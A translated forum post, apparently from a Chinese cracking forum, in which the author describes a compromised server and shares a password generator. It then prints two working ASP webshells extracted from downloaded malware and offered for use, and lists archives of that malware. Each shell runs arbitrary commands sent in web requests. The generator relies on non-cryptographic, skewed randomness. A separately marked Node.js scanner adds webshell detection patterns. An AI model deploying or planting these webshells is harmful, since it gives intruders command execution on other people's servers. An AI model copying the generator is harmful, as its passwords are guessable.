5209 views, 5 replies

[Share] Schoolkid's diary: got a trojan again, this time a quick look into it; and along the way a webcmd extracted to use

z3960
The schoolkid's cloud machine got a trojan again. The password 123456 was used for 3 years without incident; now it's chaos, infected within a week. Added letters and symbols to the password, still infected, so now I've switched to random passwords; I'll share a simple password generator in a moment. The last time it got infected I also saw a garbled file, didn't think much of it, just deleted it, changed the password and kept using the machine. This time infected again, so I decided to take a look. Couldn't open it directly, so I ran it, grabbed a few keywords from the page source and searched them on Bing, and learned this thing is called a "da ma" (big horse). I thought it was a virus made by someone named Da Ma. After reading many articles I learned that the large ones are called da ma (big horse, i.e. a full-featured webshell) and the one-liners are called xiao ma (little horse). I also saw many advertised as "no backdoor", downloaded a few and ran them locally. Result: all of them had backdoors, two trojans were killing each other, and the computer just hung. In the end I found that administrator on my computer wasn't an administrator; no permissions anywhere on the machine. I'm not running big horses anymore. Disabled IIS outright. Used Huorong's shield to shut down the leftovers. Used net user to add myself back to the administrators group, found cmd had no permission; wanted to write a bat, but no permission on C:, none on D: either. Fortunately the user directory was usable. After writing it, right-click, run as administrator, reboot, and D: could be used freely again. In short, don't trust any trojan that claims to have no backdoor. The big horse's features are pretty good and could be used in the wild, but with F12 you can see it constantly connecting to other zombie machines. Huorong also found the big horse sending stuff out via XMLHTTP. But I still kind of wanted that feature, so I decided to extract just the functions I needed. Once extracted it didn't run; luckily I'd read ASP before and found the big horse had modified the functions. Took a long time to locate them. Even the shell was written inside arrays; it took a long time to piece together one page of source.

The schoolkid's password generator
```html
<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <meta name="MobileOptimized" content="320">
    <title> 随机密码基</title>
<style>
@font-face {
  font-family: "iconfont"; /* Project id  */
  src: url('data:application/octet-stream;base64,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') format('truetype');
}
.iconfont {
  font-family: "iconfont" !important;
  font-size: 16px;
  font-style: normal;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}
.icon-copy:before {
  content: "\e67f";
}
.form-row {
    display: -ms-flexbox;
    display: flex;
    -ms-flex-wrap: wrap;
    flex-wrap: wrap;
    margin-right: -5px;
    margin-left: -5px;
}
.shadow {
    box-shadow: 0 .5rem 1rem rgba(0,0,0,.15)!important;
}
.col-md-6 {
    position: relative;
    width: 100%;
    padding-right: 15px;
    padding-left: 15px;
}
@media(min-width: 1200px){
    html {
        font-size: 138% !important;
    }
    .col-md-6 {
        -ms-flex: 0 0 50%;
        flex: 0 0 50%;
        max-width: 50%;
    }
}
*, ::after, ::before {
    box-sizing: border-box;
}
.custom-select {
    width:60%;
    padding: 0.5rem 1rem;
    background: #fff url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='4' height='5' viewBox='0 0 4 5'%3e%3cpath fill='%233e3f3a' d='M2 0L0 2h4zm0 5L0 3h4z'/%3e%3c/svg%3e") no-repeat right .75rem center/8px 10px;
    -moz-appearance: none;
    appearance: none;
}
.ck{margin-bottom: 32px;}
#zd{width:100%;}
.card-header button{
    padding: 6px 12px;
    border-radius: 33px;
}
.card-header {
    text-align: center;
    background: #ccc;
    padding: 5px;
}
.card-body {
    text-align: center;
}
#output{font-weight: 700;font-size:300%;background: #f55;color: #fff;padding: 11px 33px;}
#copycode{border: 2px solid #f55;background: #fff;color: #f55;}
#pw:active {opacity: 0;transition: 0s}
/* :active press animation (the original used a "//" comment here, which is not valid CSS and swallowed the animation-name declaration) */
#pw{transition: all 2s;animation-name: animatetop;animation-duration: 2s}
@keyframes animatetop {
    from { opacity:0}
    to { opacity:1}
}
</style>
</head>
<body>
<div class="form-row">
<div class="col-md-6 shadow ">
    <div class="input-group">
    密码长度:
      <select id="pgLength" class="custom-select">
      <option value="1">1</option> <option value="2">2</option> <option value="3">3</option>
      <option value="4">4</option> <option value="5">5</option> <option value="6" selected>6</option>
      <option value="7">7</option> <option value="8">8</option> <option value="9">9</option>
      <option value="10">10</option> <option value="11">11</option> <option value="12">12</option>
      <option value="13">13</option> <option value="14">14</option> <option value="15">15</option>
      <option value="16">16</option> <option value="17">17</option> <option value="18">18</option>
      <option value="19">19</option> <option value="20">20</option> <option value="21">21</option>
      <option value="22">22</option> <option value="23">23</option> <option value="24">24</option>
      <option value="25">25</option> <option value="26">26</option> <option value="27">27</option>
      <option value="28">28</option> <option value="29">29</option> <option value="30">30</option>
      <option value="31">31</option> <option value="32">32</option> <option value="33">33</option>
      <option value="34">34</option> <option value="35">35</option> <option value="36">36</option>
      </select>
    </div>
    <div class="ck">
    <input type="checkbox" checked id="chkl"> <label for="chkl">小写字母(a..z)</label><br>
    <input type="checkbox" checked id="chku"> <label for="chku">大写字母(A..Z)</label><br>
    <input type="checkbox" checked id="chkn"> <label for="chkn">数字(0..9)</label><br>
    <input type="checkbox" id="chksc"> <label for="chksc">特殊字符</label><br>
    <input type="checkbox" id="chkzd"><label for="chkzd">自定义</label>
        <div class=zd style="display:none">
        <textarea id="zd" rows="6">字典</textarea>
        <br>
        <button id='zdl' onclick="generateZD();"> 生成字典1</button>
        <button id='zd2' onclick="generateZD2();"> 生成字典2</button>
        </div>
    </div>
</div>
    <div class="col-md-6">
      <div class="card-header">
      <button id='pw' onclick="generatePassword();"> 生成密码</button>
      <button id="copycode"><span class="icon iconfont icon-copy"></span> 复制</button>
      </div>
      <div class="card-body">
      <h5><span id="output">aC0*vN</span></h5>
      </div>
    </div>
</div>
<script>
function $(j8) {return document.querySelector(j8);}
// Build a dictionary string from the character codes in [j, k).
function al(j,k) {
  b="";
  for (var i=j;i<k;i++){
    b+=String.fromCharCode(i);
  }
  return b;
}
$( "#pgLength" ).onchange=generatePassword;
$( "#chkl" ).onchange=generatePassword;
$( "#chku" ).onchange=generatePassword;
$( "#chkn" ).onchange=generatePassword;
$( "#chksc" ).onchange=generatePassword;
$( "#chkzd" ).onchange=function(){
    v=$(".ck .zd").style;
    console.log("%c"+v.display, "color:red");
    if($("#chkzd").checked){
    v.display='';
    }else{
    v.display='none';
    }
}
function generateZD(){$("#zd").value=al(33,127);}
function generateZD2(){$("#zd").value=al(161,256);}
function generatePassword(){
  $("#output").innerText='';
   var length = $("#pgLength").value;
   var zd = $("#zd").value;
     var string = "abcdefghijklmnopqrstuvwxyz";
     var strUpper="ABCDEFGHIJKLMNOPQRSTUVWXYZ";
     var numeric = '0123456789';
     var punctuation = '!@#$%^&*()_+~`|}{[]:;?><,./-=';
     var password = "";
     while( password.length<length ) {
         // Math.random() is not a cryptographic RNG, and multiplying two draws
         // skews the index toward the start of each alphabet.
         entity1 = Math.ceil(string.length * Math.random()*Math.random()) - 1;
         entity2 = Math.ceil(numeric.length * Math.random()*Math.random()) - 1;
         entity3 = Math.ceil(punctuation.length * Math.random()*Math.random()) - 1;
         entity4 = Math.ceil(strUpper.length * Math.random()*Math.random()) - 1;
         entity5 = Math.ceil(zd.length * Math.random()*Math.random()) - 1;
          if($("#chkl").checked || $("#chku").checked || $("#chkn").checked || $("#chksc").checked || $("#chkzd").checked) {
            // Classes are appended in a fixed order (lower, upper, digit, symbol, custom).
            if($("#chkl").checked && password.length<length){
              password += string.charAt( entity1 );
            }
            if($("#chku").checked && password.length<length){
              password += strUpper.charAt( entity4 );
            }
            if($("#chkn").checked && password.length<length ){
              password += numeric.charAt( entity2 );
            }
            if($("#chksc").checked && password.length<length){
              password += punctuation.charAt( entity3 );
            }
            if($("#chkzd").checked && password.length<length){
              password += zd.charAt( entity5 );
            }
          } else {
          $("#chkn").checked=true;
            //break;
          }
     }
     if(password.trim()) {
      $("#output").innerText=password.trim();
     } else {
      $("#output").innerText="请勾选选项!";
     }
}
$('#copycode').onclick=function() {
  var o=document.getElementById("output");
  //o.select(); // select the object
  //document.execCommand("Copy"); // run the browser copy command
  const input = document.createElement('input');
  document.body.appendChild(input);
  input.setAttribute('value', o.innerText);
  input.select();
  document.execCommand('copy');
  document.body.removeChild(input);
  v=$("#copycode");
  cc=v.innerHTML;
  v.innerHTML="已复制";
  v.style.transition='2s';
  v.style.opacity=0;
  setTimeout(function(){ v.innerHTML=cc;v.style.opacity=1; }, 2000);
}
generatePassword();
</script>
</body>
</html>
```

Extracted from the first big horse. There are two ways: direct WS (WScript.Shell), and WS redirecting to a text file and then reading the text back [screenshot won't display].
```asp
<head><title>WebCmd</title>
<style type="text/css">
body,textarea,input{background:#000;color:#fff;}
textarea,input{border-radius:13px;border:1px solid #fff;margin:1px;}
</style></head>
<%
'Server.ScriptTimeout=999999999:Response.Buffer =true
On Error Resume Next
sub ShowErr()
If Err Then
RRS"<br><a href='javascript:history.back()'><br> " & Err.Description & "</a><br>"
Err.Clear
Response.Flush
End If
end sub
Sub RRS(str)
response.write(str)
End Sub
Dim ObT(13,2)
ObT(0,0) = "Scripting.FileSystemObject":ObT(0,2) = "文件操作组件"
ObT(1,0) = "wscript.shell":ObT(1,2) = "命令行执行组件"
ObT(2,0) = "ADOX.Catalog":ObT(2,2) = "ACCESS建库组件"
ObT(3,0) = "JRO.JetEngine":ObT(3,2) = "ACCESS压缩组件"
ObT(4,0) = "Scripting.Dictionary" :ObT(4,2) = "数据流上传辅助组件"
ObT(5,0) = "Adodb.connection":ObT(5,2) = "数据库连接组件"
ObT(6,0) = "Adodb.Stream":ObT(6,2) = "数据流上传组件"
ObT(7,0) = "SoftArtisans.FileUp":ObT(7,2) = "SA-FileUp 文件上传组件"
ObT(8,0) = "LyfUpload.UploadFile":ObT(8,2) = "刘云峰文件上传组件"
ObT(9,0) = "Persits.Upload.1":ObT(9,2) = "ASPUpload 文件上传组件"
ObT(10,0) = "JMail.SmtpMail":ObT(10,2) = "JMail 邮件收发组件"
ObT(11,0) = "CDONTS.NewMail":ObT(11,2) = "虚拟SMTP发信组件"
ObT(12,0) = "SmtpMail.SmtpMail.1":ObT(12,2) = "SmtpMail发信组件"
ObT(13,0) = "Microsoft.XMLHTTP":ObT(13,2) = "数据传输组件"
Function Cmd1Shell()
checked=" checked"
If Request("SP")<>"" Then Session("ShellPath") = Request("SP")
ShellPath=Session("ShellPath")
if ShellPath="" Then ShellPath = "cmd.exe"
if Request("wscript")<>"yes" then checked=""
If Request("cmd")<>"" Then DefCmd = Request("cmd")
SI="<form method='post'>"
SI=SI&"SHELL路径:<input name='SP' value='"&ShellPath&"' Style='width:70%'>  "
SI=SI&"<input class=c type='checkbox' name='wscript' value='yes'"&checked&">WScript.Shell"
SI=SI&"<input name='cmd' Style='width:92%' value='"&DefCmd&"'> <input type='submit' value='执行'><textarea Style='width:100%;height:440;' class='cmd'>"
If Request.Form("cmd")<>"" Then
if Request.Form("wscript")="yes" then
Set CM=CreateObject(ObT(1,0))
Set DD=CM.exec(ShellPath&" /c "&DefCmd)
aaa=DD.stdout.readall
SI=SI&aaa
else
On Error Resume Next
if ws="" Then Set ws=Server.CreateObject("WScript.Shell")
Set fso=Server.CreateObject("Scripting.FileSystemObject")
szTempFile = server.mappath("cmd.txt")
Call ws.Run (ShellPath&" /c " & DefCmd & " > " & szTempFile, 0, True)
Set fs = CreateObject("Scripting.FileSystemObject")
Set oFilelcx = fs.OpenTextFile (szTempFile, 1, False, 0)
aaa=Server.HTMLEncode(oFilelcx.ReadAll)
oFilelcx.Close
Call fso.DeleteFile(szTempFile, True)
SI=SI&aaa
end if
End If
SI=SI&chr(13)&"</textarea></form>"
RRS SI
End Function
Cmd1Shell()
ShowErr()
%>
```

Second big horse: gets WS by calling the CLSID.
```asp
<style>
        body,tr,td {
            margin-top: 5px;
            background-color: #000000;
            color: #006000;
            font-size: 12px;
            scrollbar-face-color: #232323;
            scrollbar-arrow-color: #383839;
            scrollbar-highlight-color: #383839;
            scrollbar-3dlight-color: #dddddd;
            scrollbar-shadow-color: #232323}
        input,select,textarea {
            border-top-width: 1px;
            font-weight: bold;
            border-left-width: 1px;
            font-size: 11px;
            border-left-color: #dddddd;
            background: #000000;
            border-bottom-width: 1px;
            border-bottom-color: #dddddd;
            color: #dddddd;
            border-top-color: #dddddd;
            font-family: verdana;
            border-right-width: 1px;
            border-right-color: #dddddd;
        }
</style>
<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<%
Sub RRS(str)
response.write(str)
End Sub
Sub j(str)
response.write(str)
End Sub
function Cmdx()
j("<center><form method='post'> ")
j("<input type=text name='cmdx' size=60 value='cmd.exe'><br> ")
j("<input type=text name='cmd' size=60><br> ")
j("<input type=submit value='Sumbit'></form> ")
j("<textarea readonly cols=150 rows=27> ")
On Error Resume Next
j oScriptlhn.exec(request("cmdx")&" /c"&request("cmd")).stdout.readall
j("</textarea></center>")
end function
cmdx()
RRS"<br><a href='javascript:history.back()'><br> " & Err.Description & "</a><br>"
Err.Clear
Response.Flush
%>
```

It can be used to control your own computer, but be careful that it doesn't get used by a trojan. I originally wanted to write a long article analyzing the code, but the keyboard broke and this post sat in drafts for days. Now I don't feel like writing that much; it really wore the schoolkid out. I almost posted without attaching the big horse. It's all encoded, and I don't know whether my password information is hidden inside. Found a decoding tool on Baidu, but it's 16-bit and needs MS-DOS, so I can't decode it for now. Parts can be decoded with response.write, which is a bit of a hassle.
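Both extracted WebCmd pages share a small set of traits a defender can key on when triaging an IIS webroot: WScript.Shell reached either by ProgID string or by the two CLSIDs used in the `<object runat=server>` trick above, an `.exec(...)` or `.Run(...)` call whose argument is built from `Request(...)`, and `.stdout.readall` to return the output. The following is an added example, not code from the post or from the extracted shells: a Node.js scanner that scores those indicators and, for the exec/Run sink, follows one hop of assignment from `Request(...)` into a variable (the first shell passes the command through `DefCmd`, the second calls `request("cmd")` inline). Indicator weights, the verdict threshold and the three sample pages are constructed for this demo.

```javascript
// Added example (not code from the post or the extracted shells): triage
// scanner for ASP/VBScript pages. Weights and threshold are demo assumptions.
'use strict';

const INDICATORS = [
  { id: 'wscript-shell-progid', weight: 3, re: /["']wscript\.shell["']/i },
  { id: 'wscript-shell-clsid', weight: 3,   // the two CLSIDs from the second WebCmd
    re: /clsid:(?:72C24DD5-D70A-438B-8A42-98424B88AFB8|F935DC22-1CF0-11D0-ADB9-00C04FD58A0B)/i },
  { id: 'stdout-readall', weight: 2, re: /\.stdout\.readall/i },
  { id: 'filesystemobject', weight: 1, re: /["']Scripting\.FileSystemObject["']/i },
  { id: 'xmlhttp', weight: 1, re: /["']Microsoft\.XMLHTTP["']/i },
];

// Text inside the parentheses opening at src[open], honouring nesting and
// VBScript double-quoted strings (a ')' inside "..." must not end the call).
function argumentText(src, open) {
  let depth = 0, inStr = false;
  for (let i = open; i < src.length; i++) {
    const ch = src[i];
    if (inStr) { if (ch === '"') inStr = false; continue; }
    if (ch === '"') inStr = true;
    else if (ch === '(') depth++;
    else if (ch === ')' && --depth === 0) return src.slice(open + 1, i);
  }
  return src.slice(open + 1); // unbalanced call: take the rest of the file
}

// Names assigned straight from Request(...), Request.Form(...), Request.QueryString(...).
function taintedNames(src) {
  const names = new Set();
  const re = /(\w+)\s*=\s*Request(?:\.\w+)?\s*\(/gi;
  let m;
  while ((m = re.exec(src)) !== null) names.add(m[1].toLowerCase());
  return names;
}

// .exec(...) / .Run(...) calls whose arguments contain Request(...) directly or
// a variable assigned from it: a request-controlled command sink.
function requestReachesShell(src) {
  const tainted = taintedNames(src);
  const callRe = /\.(exec|run)\s*\(/gi;
  const sinks = [];
  let m;
  while ((m = callRe.exec(src)) !== null) {
    const args = argumentText(src, m.index + m[0].length - 1);
    const direct = /\brequest(?:\.\w+)?\s*\(/i.test(args);
    const viaVar = (args.match(/\b[A-Za-z_]\w*\b/g) || [])
      .some((w) => tainted.has(w.toLowerCase()));
    if (direct || viaVar) sinks.push(`${m[1].toLowerCase()}(${args.trim()})`);
  }
  return sinks;
}

function scanAsp(src) {
  const matched = INDICATORS.filter((i) => i.re.test(src));
  const hits = matched.map((i) => i.id);
  let score = matched.reduce((s, i) => s + i.weight, 0);
  const sinks = requestReachesShell(src);
  if (sinks.length > 0) { hits.push('request-to-shell'); score += 5; }
  return { hits, sinks, score, verdict: score >= 5 ? 'likely webshell' : 'no strong indicators' };
}

// Constructed samples: the shape of the CLSID-based WebCmd, the shape of the
// variable-based one, and an ordinary form handler that only uses FileSystemObject.
const SAMPLE_SHELL = [
  '<object runat=server id=oScr scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>',
  '<%', 'On Error Resume Next',
  'response.write oScr.exec(request("cmdx")&" /c"&request("cmd")).stdout.readall',
  '%>',
].join('\n');
const SAMPLE_SHELL_VAR = [
  '<%', 'If Request("cmd")<>"" Then DefCmd = Request("cmd")',
  'Set CM=CreateObject("wscript.shell")',
  'Set DD=CM.exec("cmd.exe /c "&DefCmd)', 'aaa=DD.stdout.readall', '%>',
].join('\n');
const SAMPLE_BENIGN = [
  '<%', 'name = Request.Form("name")',
  'Set fso = Server.CreateObject("Scripting.FileSystemObject")',
  'Response.Write Server.HTMLEncode(name)', '%>',
].join('\n');

for (const [label, src] of [['clsid-shell', SAMPLE_SHELL], ['var-shell', SAMPLE_SHELL_VAR], ['benign', SAMPLE_BENIGN]]) {
  console.log(label, JSON.stringify(scanAsp(src)));
}
```

Run it over every `.asp`/`.asa` file under the webroot and review anything scoring at or above the threshold. The benign sample shows why FileSystemObject alone carries little weight: ordinary pages use it, so the decisive signal is the sink, a request value flowing into exec/Run. The one-hop taint check is a heuristic; shells that build the command through Session (as the first WebCmd does for the shell path) or through array indirection like `ObT(1,0)` still light up the ProgID/CLSID and readall indicators but can evade the sink rule, so treat a weak score on a recently modified file as a reason to read it, not to clear it.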


Attachments:
大马植入的东西.7z (files implanted by the big horse): 37.75 KB, 6 downloads, download credit: 吾爱币 -1 CB
Password: 52pojie
大马.7z (the big horse): 73.52 KB, 7 downloads, download credit: 吾爱币 -1 CB
Password (default: 52pojie)
webcmd2.7z: 890 Bytes, 4 downloads, download credit: 吾爱币 -1 CB
Password (default: 52pojie)
webcmd.7z: 1.4 KB, 6 downloads, download credit: 吾爱币 -1 CB
Recent rating record for this post: 1 rating, 飞扬币 +50
爱我中华, 飞扬币 +50, 2022-09-16: "Your post is excellent, thank you for your effort!"
Keyword: 木马 (trojan)
Reply 1, posted 2022-09-16:
Safety first.
Reply 2, posted 2022-09-17:
Let me take a look.
Reply 3, posted 2022-09-17:
Nice, learned something.
srwam, reply 4, posted 2022-09-21:
Let me take a look.
srwam, reply 5, posted 2022-09-21:
Also speechless.